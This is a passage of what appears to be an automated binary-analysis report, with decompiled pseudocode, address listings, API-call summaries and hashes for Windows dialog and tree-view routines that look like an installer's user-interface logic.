                              									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                              										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                              									}
                              									_t243 = _v16;
                              									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                              										_t298 = _v24;
                              										_t244 =  *(_t243 + 0x5c);
                              										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                              											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                              										} else {
                              											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                              										}
                              									}
                              								}
                              								goto L48;
                              							}
                              							if(_a8 == 0x413) {
                              								L33:
                              								_t298 = 0 | _a8 != 0x00000413;
                              								_t250 = E00404BFF(_v8, _a8 != 0x413);
                              								_t325 = _t250;
                              								if(_t325 >= 0) {
                              									_t99 = _v24 + 8; // 0x8
                              									_t298 = _t250 * 0x418 + _t99;
                              									_t252 =  *_t298;
                              									if((_t252 & 0x00000010) == 0) {
                              										if((_t252 & 0x00000040) == 0) {
                              											_t253 = _t252 ^ 0x00000001;
                              										} else {
                              											_t259 = _t252 ^ 0x00000080;
                              											if(_t259 >= 0) {
                              												_t253 = _t259 & 0x000000fe;
                              											} else {
                              												_t253 = _t259 | 0x00000001;
                              											}
                              										}
                              										 *_t298 = _t253;
                              										E0040117D(_t325);
                              										_a12 = _t325 + 1;
                              										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
                              										_a8 = 0x40f;
                              									}
                              								}
                              								goto L41;
                              							}
                              							_t298 = _a16;
                              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                              								goto L41;
                              							}
                              							goto L33;
                              						} else {
                              							goto L48;
                              						}
                              					} else {
                              						L48:
                              						if(_a8 != 0x111) {
                              							L56:
                              							if(_a8 == 0x200) {
                              								SendMessageA(_v8, 0x200, 0, 0);
                              							}
                              							if(_a8 == 0x40b) {
                              								_t230 =  *0x420d34;
                              								if(_t230 != 0) {
                              									ImageList_Destroy(_t230);
                              								}
                              								_t231 =  *0x420d48;
                              								if(_t231 != 0) {
                              									GlobalFree(_t231);
                              								}
                              								 *0x420d34 = 0;
                              								 *0x420d48 = 0;
                              								 *0x4247c0 = 0;
                              							}
                              							if(_a8 != 0x40f) {
                              								L90:
                              								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
                              									_t321 = (0 | _a16 == 0x00000020) << 3;
                              									ShowWindow(_v8, _t321);
                              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                              								}
                              								goto L93;
                              							} else {
                              								E004011EF(_t298, 0, 0);
                              								_t203 = _a12;
                              								if(_t203 != 0) {
                              									if(_t203 != 0xffffffff) {
                              										_t203 = _t203 - 1;
                              									}
                              									_push(_t203);
                              									_push(8);
                              									E00404C7F();
                              								}
                              								if(_a16 == 0) {
                              									L75:
                              									E004011EF(_t298, 0, 0);
                              									_v36 =  *0x420d48;
                              									_t206 =  *0x424788;
                              									_v64 = 0xf030;
                              									_v24 = 0;
                              									if( *0x42478c <= 0) {
                              										L86:
                              										if( *0x42474c == 4) {
                              											InvalidateRect(_v8, 0, 1);
                              										}
                              										_t207 =  *0x423f1c; // 0x5f57f6
                              										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                              											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
                              										}
                              										goto L90;
                              									}
                              									_t322 = _t206 + 8;
                              									do {
                              										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                              										if(_t212 != 0) {
                              											_t300 =  *_t322;
                              											_v72 = _t212;
                              											_v76 = 8;
                              											if((_t300 & 0x00000001) != 0) {
                              												_v76 = 9;
                              												_v60 =  &(_t322[4]);
                              												_t322[0] = _t322[0] & 0x000000fe;
                              											}
                              											if((_t300 & 0x00000040) == 0) {
                              												_t216 = (_t300 & 0x00000001) + 1;
                              												if((_t300 & 0x00000010) != 0) {
                              													_t216 = _t216 + 3;
                              												}
                              											} else {
                              												_t216 = 3;
                              											}
                              											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                              											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                              											SendMessageA(_v8, 0x110d, 0,  &_v76);
                              										}
                              										_v24 = _v24 + 1;
                              										_t322 =  &(_t322[0x106]);
                              									} while (_v24 <  *0x42478c);
                              									goto L86;
                              								} else {
                              									_t323 = E004012E2( *0x420d48);
                              									E00401299(_t323);
                              									_t227 = 0;
                              									_t298 = 0;
                              									if(_t323 <= 0) {
                              										L74:
                              										SendMessageA(_v12, 0x14e, _t298, 0);
                              										_a16 = _t323;
                              										_a8 = 0x420;
                              										goto L75;
                              									} else {
                              										goto L71;
                              									}
                              									do {
                              										L71:
                              										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                              											_t298 = _t298 + 1;
                              										}
                              										_t227 = _t227 + 1;
                              									} while (_t227 < _t323);
                              									goto L74;
                              								}
                              							}
                              						}
                              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                              							goto L93;
                              						} else {
                              							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                              							if(_t237 == 0xffffffff) {
                              								goto L93;
                              							}
                              							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                              							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                              								_t324 = 0x20;
                              							}
                              							E00401299(_t324);
                              							SendMessageA(_a4, 0x420, 0, _t324);
                              							_a12 = _a12 | 0xffffffff;
                              							_a16 = 0;
                              							_a8 = 0x40f;
                              							goto L56;
                              						}
                              					}
                              				} else {
                              					_v36 = 0;
                              					 *0x4247c0 = _a4;
                              					_v20 = 2;
                              					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
                              					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
                              					 *0x420d3c =  *0x420d3c | 0xffffffff;
                              					_v16 = _t264;
                              					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
                              					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                              					 *0x420d34 = _t266;
                              					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                              					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
                              					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                              						SendMessageA(_v8, 0x111b, _t320, 0);
                              					}
                              					DeleteObject(_v16);
                              					_t327 = 0;
                              					do {
                              						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                              						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                              							if(_t327 != 0x20) {
                              								_v20 = 0;
                              							}
                              							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
                              						}
                              						_t327 = _t327 + 1;
                              					} while (_t327 < 0x21);
                              					_t328 = _a16;
                              					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                              					_push(0x15);
                              					E004042AC(_a4);
                              					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                              					_push(0x16);
                              					E004042AC(_a4);
                              					_t329 = 0;
                              					_v16 = 0;
                              					if( *0x42478c <= 0) {
                              						L19:
                              						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                              						goto L20;
                              					} else {
                              						_t316 = _v24 + 8;
                              						_v32 = _t316;
                              						do {
                              							_t284 =  &(_t316[0x10]);
                              							if( *_t284 != 0) {
                              								_v64 = _t284;
                              								_t285 =  *_t316;
                              								_v88 = _v16;
                              								_t308 = 0x20;
                              								_v84 = 0xffff0002;
                              								_v80 = 0xd;
                              								_v68 = _t308;
                              								_v44 = _t329;
                              								_v72 = _t285 & _t308;
                              								if((_t285 & 0x00000002) == 0) {
                              									if((_t285 & 0x00000004) == 0) {
                              										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                              									} else {
                              										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                              									}
                              								} else {
                              									_v80 = 0x4d;
                              									_v48 = 1;
                              									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                              									_v36 = 1;
                              									 *( *0x420d48 + _t329 * 4) = _t290;
                              									_v16 =  *( *0x420d48 + _t329 * 4);
                              								}
                              							}
                              							_t329 = _t329 + 1;
                              							_t316 =  &(_v32[0x418]);
                              							_v32 = _t316;
                              						} while (_t329 <  *0x42478c);
                              						if(_v36 != 0) {
                              							L20:
                              							if(_v20 != 0) {
                              								E004042E1(_v8);
                              								goto L23;
                              							} else {
                              								ShowWindow(_v12, 5);
                              								E004042E1(_v12);
                              								L93:
                              								return E00404313(_a8, _a12, _a16);
                              							}
                              						}
                              						goto L19;
                              					}
                              				}
                              			}
                              0x0040525a
                              0x004051a0
                              0x004051a3
                              0x004051a9
                              0x004051ae
                              0x004051b0
                              0x004051b2
                              0x004051b8
                              0x004051bf
                              0x004051c4
                              0x004051cb
                              0x004051ce
                              0x004051ce
                              0x004051d5
                              0x004051e1
                              0x004051e5
                              0x004051e7
                              0x004051e7
                              0x004051d7
                              0x004051d9
                              0x004051d9
                              0x00405207
                              0x00405213
                              0x00405222
                              0x00405222
                              0x00405224
                              0x00405227
                              0x00405230
                              0x00000000
                              0x00405137
                              0x00405142
                              0x00405145
                              0x0040514a
                              0x0040514c
                              0x00405150
                              0x00405160
                              0x0040516a
                              0x0040516c
                              0x0040516f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405152
                              0x00405152
                              0x00405158
                              0x0040515a
                              0x0040515a
                              0x0040515b
                              0x0040515c
                              0x00000000
                              0x00405152
                              0x00405135
                              0x00405110
                              0x00405053
                              0x00000000
                              0x00405069
                              0x00405073
                              0x00405078
                              0x00000000
                              0x00000000
                              0x0040508a
                              0x0040508f
                              0x0040509b
                              0x0040509b
                              0x0040509d
                              0x004050ac
                              0x004050ae
                              0x004050b2
                              0x004050b5
                              0x00000000
                              0x004050b5
                              0x00405053
                              0x00404d07
                              0x00404d0a
                              0x00404d0d
                              0x00404d1d
                              0x00404d30
                              0x00404d3b
                              0x00404d41
                              0x00404d4f
                              0x00404d62
                              0x00404d67
                              0x00404d72
                              0x00404d7b
                              0x00404d91
                              0x00404da1
                              0x00404dad
                              0x00404dad
                              0x00404db2
                              0x00404db8
                              0x00404dba
                              0x00404dbd
                              0x00404dc2
                              0x00404dc7
                              0x00404dc9
                              0x00404dc9
                              0x00404de9
                              0x00404de9
                              0x00404deb
                              0x00404dec
                              0x00404df1
                              0x00404df7
                              0x00404dfb
                              0x00404e00
                              0x00404e08
                              0x00404e0c
                              0x00404e11
                              0x00404e16
                              0x00404e1e
                              0x00404e21
                              0x00404ef0
                              0x00404f03
                              0x00000000
                              0x00404e27
                              0x00404e2a
                              0x00404e2d
                              0x00404e30
                              0x00404e30
                              0x00404e35
                              0x00404e3e
                              0x00404e41
                              0x00404e45
                              0x00404e48
                              0x00404e4b
                              0x00404e54
                              0x00404e5d
                              0x00404e60
                              0x00404e63
                              0x00404e66
                              0x00404ea4
                              0x00404ecf
                              0x00404ea6
                              0x00404eb5
                              0x00404eb5
                              0x00404e68
                              0x00404e6b
                              0x00404e79
                              0x00404e83
                              0x00404e8b
                              0x00404e92
                              0x00404e9d
                              0x00404e9d
                              0x00404e66
                              0x00404ed5
                              0x00404ed6
                              0x00404ee2
                              0x00404ee2
                              0x00404eee
                              0x00404f09
                              0x00404f0c
                              0x00404f29
                              0x00000000
                              0x00404f0e
                              0x00404f13
                              0x00404f1c
                              0x004052ae
                              0x004052c0
                              0x004052c0
                              0x00404f0c
                              0x00000000
                              0x00404eee
                              0x00404e21

                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404CC8
                              • GetDlgItem.USER32(?,00000408), ref: 00404CD5
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
                              • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D3B
                              • SetWindowLongA.USER32 ref: 00404D55
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
                              • SendMessageA.USER32 ref: 00404D91
                              • SendMessageA.USER32 ref: 00404D9D
                              • SendMessageA.USER32 ref: 00404DAD
                              • DeleteObject.GDI32(00000110), ref: 00404DB2
                              • SendMessageA.USER32 ref: 00404DDD
                              • SendMessageA.USER32 ref: 00404DE9
                              • SendMessageA.USER32 ref: 00404E83
                              • SendMessageA.USER32 ref: 00404EB3
                                • Part of subcall function 004042E1: SendMessageA.USER32 ref: 004042EF
                              • SendMessageA.USER32 ref: 00404EC7
                              • GetWindowLongA.USER32(?,000000F0), ref: 00404EF5
                              • SetWindowLongA.USER32 ref: 00404F03
                              • ShowWindow.USER32(?,00000005), ref: 00404F13
                              • SendMessageA.USER32 ref: 0040500E
                              • SendMessageA.USER32 ref: 00405073
                              • SendMessageA.USER32 ref: 00405088
                              • SendMessageA.USER32 ref: 004050AC
                              • SendMessageA.USER32 ref: 004050CC
                              • ImageList_Destroy.COMCTL32(?), ref: 004050E1
                              • GlobalFree.KERNEL32(?), ref: 004050F1
                              • SendMessageA.USER32 ref: 0040516A
                              • SendMessageA.USER32 ref: 00405213
                              • SendMessageA.USER32 ref: 00405222
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
                              • ShowWindow.USER32(?,00000000), ref: 0040529A
                              • GetDlgItem.USER32(?,000003FE), ref: 004052A5
                              • ShowWindow.USER32(00000000), ref: 004052AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $M$N
                              • API String ID: 2564846305-813528018
                              • Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                              • Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
                              • Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                              • Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                              				struct HWND__* _v32;
                              				void* _v80;
                              				void* _v84;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t35;
                              				signed int _t37;
                              				signed int _t39;
                              				struct HWND__* _t49;
                              				signed int _t68;
                              				struct HWND__* _t74;
                              				signed int _t87;
                              				struct HWND__* _t92;
                              				signed int _t100;
                              				int _t104;
                              				signed int _t116;
                              				signed int _t117;
                              				int _t118;
                              				signed int _t123;
                              				struct HWND__* _t126;
                              				struct HWND__* _t127;
                              				int _t128;
                              				long _t131;
                              				int _t133;
                              				int _t134;
                              				void* _t135;
                              				void* _t143;
                              
                              				_t116 = _a8;
                              				if(_t116 == 0x110 || _t116 == 0x408) {
                              					_t35 = _a12;
                              					_t126 = _a4;
                              					__eflags = _t116 - 0x110;
                              					 *0x420d38 = _t35;
                              					if(_t116 == 0x110) {
                              						 *0x424748 = _t126;
                              						 *0x420d4c = GetDlgItem(_t126, 1);
                              						_t92 = GetDlgItem(_t126, 2);
                              						_push(0xffffffff);
                              						_push(0x1c);
                              						 *0x41fd18 = _t92;
                              						E004042AC(_t126);
                              						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
                              						 *0x423f0c = E0040140B(4);
                              						_t35 = 1;
                              						__eflags = 1;
                              						 *0x420d38 = 1;
                              					}
                              					_t123 =  *0x40a1f8; // 0xffffffff
                              					_t134 = 0;
                              					_t131 = (_t123 << 6) +  *0x424780;
                              					__eflags = _t123;
                              					if(_t123 < 0) {
                              						L34:
                              						E004042F8(0x40b);
                              						while(1) {
                              							_t37 =  *0x420d38;
                              							 *0x40a1f8 =  *0x40a1f8 + _t37;
                              							_t131 = _t131 + (_t37 << 6);
                              							_t39 =  *0x40a1f8; // 0xffffffff
                              							__eflags = _t39 -  *0x424784;
                              							if(_t39 ==  *0x424784) {
                              								E0040140B(1);
                              							}
                              							__eflags =  *0x423f0c - _t134; // 0x0
                              							if(__eflags != 0) {
                              								break;
                              							}
                              							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
                              							if(__eflags >= 0) {
                              								break;
                              							}
                              							_t117 =  *(_t131 + 0x14);
                              							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
                              							_push( *((intOrPtr*)(_t131 + 0x20)));
                              							_push(0xfffffc19);
                              							E004042AC(_t126);
                              							_push( *((intOrPtr*)(_t131 + 0x1c)));
                              							_push(0xfffffc1b);
                              							E004042AC(_t126);
                              							_push( *((intOrPtr*)(_t131 + 0x28)));
                              							_push(0xfffffc1a);
                              							E004042AC(_t126);
                              							_t49 = GetDlgItem(_t126, 3);
                              							__eflags =  *0x4247ec - _t134;
                              							_v32 = _t49;
                              							if( *0x4247ec != _t134) {
                              								_t117 = _t117 & 0x0000fefd | 0x00000004;
                              								__eflags = _t117;
                              							}
                              							ShowWindow(_t49, _t117 & 0x00000008);
                              							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                              							E004042CE(_t117 & 0x00000002);
                              							_t118 = _t117 & 0x00000004;
                              							EnableWindow( *0x41fd18, _t118);
                              							__eflags = _t118 - _t134;
                              							if(_t118 == _t134) {
                              								_push(1);
                              							} else {
                              								_push(_t134);
                              							}
                              							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                              							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                              							__eflags =  *0x4247ec - _t134;
                              							if( *0x4247ec == _t134) {
                              								_push( *0x420d4c);
                              							} else {
                              								SendMessageA(_t126, 0x401, 2, _t134);
                              								_push( *0x41fd18);
                              							}
                              							E004042E1();
                              							E00406228(0x420d50, E00403DB9());
                              							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
                              							SetWindowTextA(_t126, 0x420d50);
                              							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
                              							__eflags = _t68;
                              							if(_t68 != 0) {
                              								continue;
                              							} else {
                              								__eflags =  *_t131 - _t134;
                              								if( *_t131 == _t134) {
                              									continue;
                              								}
                              								__eflags =  *(_t131 + 4) - 5;
                              								if( *(_t131 + 4) != 5) {
                              									DestroyWindow( *0x423f18);
                              									 *0x420528 = _t131;
                              									__eflags =  *_t131 - _t134;
                              									if( *_t131 <= _t134) {
                              										goto L58;
                              									}
                              									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
                              									__eflags = _t74 - _t134;
                              									 *0x423f18 = _t74;
                              									if(_t74 == _t134) {
                              										goto L58;
                              									}
                              									_push( *((intOrPtr*)(_t131 + 0x2c)));
                              									_push(6);
                              									E004042AC(_t74);
                              									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                              									ScreenToClient(_t126, _t135 + 0x10);
                              									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                              									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
                              									__eflags =  *0x423f0c - _t134; // 0x0
                              									if(__eflags != 0) {
                              										goto L61;
                              									}
                              									ShowWindow( *0x423f18, 8);
                              									E004042F8(0x405);
                              									goto L58;
                              								}
                              								__eflags =  *0x4247ec - _t134;
                              								if( *0x4247ec != _t134) {
                              									goto L61;
                              								}
                              								__eflags =  *0x4247e0 - _t134;
                              								if( *0x4247e0 != _t134) {
                              									continue;
                              								}
                              								goto L61;
                              							}
                              						}
                              						DestroyWindow( *0x423f18);
                              						 *0x424748 = _t134;
                              						EndDialog(_t126,  *0x420120);
                              						goto L58;
                              					} else {
                              						__eflags = _t35 - 1;
                              						if(_t35 != 1) {
                              							L33:
                              							__eflags =  *_t131 - _t134;
                              							if( *_t131 == _t134) {
                              								goto L61;
                              							}
                              							goto L34;
                              						}
                              						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
                              						__eflags = _t87;
                              						if(_t87 == 0) {
                              							goto L33;
                              						}
                              						SendMessageA( *0x423f18, 0x40f, 0, 1);
                              						__eflags =  *0x423f0c - _t134; // 0x0
                              						return 0 | __eflags == 0x00000000;
                              					}
                              				} else {
                              					_t126 = _a4;
                              					_t134 = 0;
                              					if(_t116 == 0x47) {
                              						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
                              					}
                              					if(_t116 == 5) {
                              						asm("sbb eax, eax");
                              						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
                              					}
                              					if(_t116 != 0x40d) {
                              						__eflags = _t116 - 0x11;
                              						if(_t116 != 0x11) {
                              							__eflags = _t116 - 0x111;
                              							if(_t116 != 0x111) {
                              								L26:
                              								return E00404313(_t116, _a12, _a16);
                              							}
                              							_t133 = _a12 & 0x0000ffff;
                              							_t127 = GetDlgItem(_t126, _t133);
                              							__eflags = _t127 - _t134;
                              							if(_t127 == _t134) {
                              								L13:
                              								__eflags = _t133 - 1;
                              								if(_t133 != 1) {
                              									__eflags = _t133 - 3;
                              									if(_t133 != 3) {
                              										_t128 = 2;
                              										__eflags = _t133 - _t128;
                              										if(_t133 != _t128) {
                              											L25:
                              											SendMessageA( *0x423f18, 0x111, _a12, _a16);
                              											goto L26;
                              										}
                              										__eflags =  *0x4247ec - _t134;
                              										if( *0x4247ec == _t134) {
                              											_t100 = E0040140B(3);
                              											__eflags = _t100;
                              											if(_t100 != 0) {
                              												goto L26;
                              											}
                              											 *0x420120 = 1;
                              											L21:
                              											_push(0x78);
                              											L22:
                              											E00404285();
                              											goto L26;
                              										}
                              										E0040140B(_t128);
                              										 *0x420120 = _t128;
                              										goto L21;
                              									}
                              									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
                              									if(__eflags <= 0) {
                              										goto L25;
                              									}
                              									_push(0xffffffff);
                              									goto L22;
                              								}
                              								_push(_t133);
                              								goto L22;
                              							}
                              							SendMessageA(_t127, 0xf3, _t134, _t134);
                              							_t104 = IsWindowEnabled(_t127);
                              							__eflags = _t104;
                              							if(_t104 == 0) {
                              								goto L61;
                              							}
                              							goto L13;
                              						}
                              						SetWindowLongA(_t126, _t134, _t134);
                              						return 1;
                              					} else {
                              						DestroyWindow( *0x423f18);
                              						 *0x423f18 = _a12;
                              						L58:
                              						if( *0x421d50 == _t134) {
                              							_t143 =  *0x423f18 - _t134; // 0x0
                              							if(_t143 != 0) {
                              								ShowWindow(_t126, 0xa);
                              								 *0x421d50 = 1;
                              							}
                              						}
                              						L61:
                              						return 0;
                              					}
                              				}
                              			}































                              0x00404225
                              0x00404230
                              0x00000000
                              0x00404230
                              0x0040415a
                              0x00404160
                              0x00000000
                              0x00000000
                              0x00404166
                              0x0040416c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00404172
                              0x00404146
                              0x0040423d
                              0x00404249
                              0x00404250
                              0x00000000
                              0x00403fa0
                              0x00403fa0
                              0x00403fa3
                              0x00403fd6
                              0x00403fd6
                              0x00403fd8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00403fd8
                              0x00403fa9
                              0x00403fae
                              0x00403fb0
                              0x00000000
                              0x00000000
                              0x00403fc0
                              0x00403fc8
                              0x00000000
                              0x00403fce
                              0x00403dfc
                              0x00403dfc
                              0x00403e00
                              0x00403e05
                              0x00403e14
                              0x00403e14
                              0x00403e1d
                              0x00403e26
                              0x00403e31
                              0x00403e31
                              0x00403e3d
                              0x00403e59
                              0x00403e5c
                              0x00403e6f
                              0x00403e75
                              0x00403f18
                              0x00000000
                              0x00403f21
                              0x00403e7b
                              0x00403e88
                              0x00403e8a
                              0x00403e8c
                              0x00403eab
                              0x00403eab
                              0x00403eae
                              0x00403eb3
                              0x00403eb6
                              0x00403ec6
                              0x00403ec7
                              0x00403ec9
                              0x00403eff
                              0x00403f12
                              0x00000000
                              0x00403f12
                              0x00403ecb
                              0x00403ed1
                              0x00403eea
                              0x00403eef
                              0x00403ef1
                              0x00000000
                              0x00000000
                              0x00403ef3
                              0x00403edf
                              0x00403edf
                              0x00403ee1
                              0x00403ee1
                              0x00000000
                              0x00403ee1
                              0x00403ed4
                              0x00403ed9
                              0x00000000
                              0x00403ed9
                              0x00403eb8
                              0x00403ebe
                              0x00000000
                              0x00000000
                              0x00403ec0
                              0x00000000
                              0x00403ec0
                              0x00403eb0
                              0x00000000
                              0x00403eb0
                              0x00403e96
                              0x00403e9d
                              0x00403ea3
                              0x00403ea5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00403ea5
                              0x00403e61
                              0x00000000
                              0x00403e3f
                              0x00403e45
                              0x00403e4f
                              0x00404256
                              0x0040425c
                              0x0040425e
                              0x00404264
                              0x00404269
                              0x0040426f
                              0x0040426f
                              0x00404264
                              0x00404279
                              0x00000000
                              0x00404279
                              0x00403e3d

                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
                              • ShowWindow.USER32(?), ref: 00403E31
                              • DestroyWindow.USER32 ref: 00403E45
                              • SetWindowLongA.USER32 ref: 00403E61
                              • GetDlgItem.USER32(?,?), ref: 00403E82
                              • SendMessageA.USER32 ref: 00403E96
                              • IsWindowEnabled.USER32(00000000), ref: 00403E9D
                              • GetDlgItem.USER32(?,00000001), ref: 00403F4B
                              • GetDlgItem.USER32(?,00000002), ref: 00403F55
                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403F6F
                              • SendMessageA.USER32 ref: 00403FC0
                              • GetDlgItem.USER32(?,00000003), ref: 00404066
                              • ShowWindow.USER32(00000000,?), ref: 00404087
                              • EnableWindow.USER32(?,?), ref: 00404099
                              • EnableWindow.USER32(?,?), ref: 004040B4
                              • GetSystemMenu.USER32 ref: 004040CA
                              • EnableMenuItem.USER32 ref: 004040D1
                              • SendMessageA.USER32 ref: 004040E9
                              • SendMessageA.USER32 ref: 004040FC
                              • lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
                              • SetWindowTextA.USER32(?,00420D50), ref: 00404135
                              • ShowWindow.USER32(?,0000000A), ref: 00404269
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                              • String ID: PB
                              • API String ID: 184305955-3196168531
                              • Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                              • Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
                              • Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
                              • Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E00403A3B(void* __eflags) {
                              				intOrPtr _v4;
                              				intOrPtr _v8;
                              				int _v12;
                              				void _v16;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr* _t17;
                              				void* _t25;
                              				void* _t27;
                              				int _t28;
                              				void* _t31;
                              				int _t34;
                              				int _t35;
                              				intOrPtr _t36;
                              				int _t39;
                              				char _t57;
                              				CHAR* _t59;
                              				signed char _t63;
                              				CHAR* _t74;
                              				intOrPtr _t76;
                              				CHAR* _t81;
                              
                              				_t76 =  *0x424754;
                              				_t17 = E00406631(2);
                              				_t84 = _t17;
                              				if(_t17 == 0) {
                              					_t74 = 0x420d50;
                              					"1033" = 0x30;
                              					 *0x42b001 = 0x78;
                              					 *0x42b002 = 0;
